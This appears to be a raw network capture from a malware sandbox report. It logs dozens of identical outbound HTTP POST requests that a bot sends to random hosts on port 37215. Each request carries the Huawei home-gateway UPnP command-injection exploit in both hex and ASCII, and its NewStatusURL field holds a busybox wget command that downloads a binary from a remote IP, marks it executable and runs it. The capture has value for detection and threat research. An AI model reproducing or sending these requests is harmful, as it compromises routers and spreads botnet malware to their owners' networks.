                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            801192.168.2.153415241.70.111.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740565062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            802192.168.2.155648641.7.237.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740608931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            803192.168.2.155120441.4.40.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740612030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            804192.168.2.153515441.108.216.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740637064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            805192.168.2.155566841.249.214.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740683079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            806192.168.2.154697241.90.128.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740694046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            807192.168.2.154551041.161.103.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740750074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            808192.168.2.155419441.114.27.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740772963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            809192.168.2.153993841.220.56.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740797997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            810192.168.2.155131041.100.204.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740798950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
